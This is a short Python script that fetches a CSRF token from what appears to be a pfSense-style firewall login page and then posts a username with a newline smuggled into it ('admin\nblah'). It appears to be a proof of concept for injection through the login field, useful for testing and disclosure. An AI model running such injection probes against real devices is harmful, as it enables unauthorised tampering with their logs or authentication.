#!/usr/bin/env python3
import requests
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup

baseurl  = 'https://198.51.100.129'

target = baseurl + '/index.php'

login_data = {
    'login'        : 'Login',
    'usernamefld'  : 'admin\nblah',
    'passwordfld'  : 'somewrongpassword',
}

headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'}

with requests.Session() as s:
    # Fetch CSRF token from login page
    r = s.get(baseurl, headers=headers, verify=False)

    soup = BeautifulSoup(r.text, 'lxml')
    login_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value']

    # Login
    r = s.post(baseurl, data=login_data, headers=headers)

    # Dump input errors from response
    soup = BeautifulSoup(r.text, 'lxml')
    input_errors = [errors.text for errors in soup.select('div.input-errors ul li')]
    if (input_errors):
        print("Input errors:\n")
        for ie in input_errors:
            print("* " + ie + "\n")

print('Done')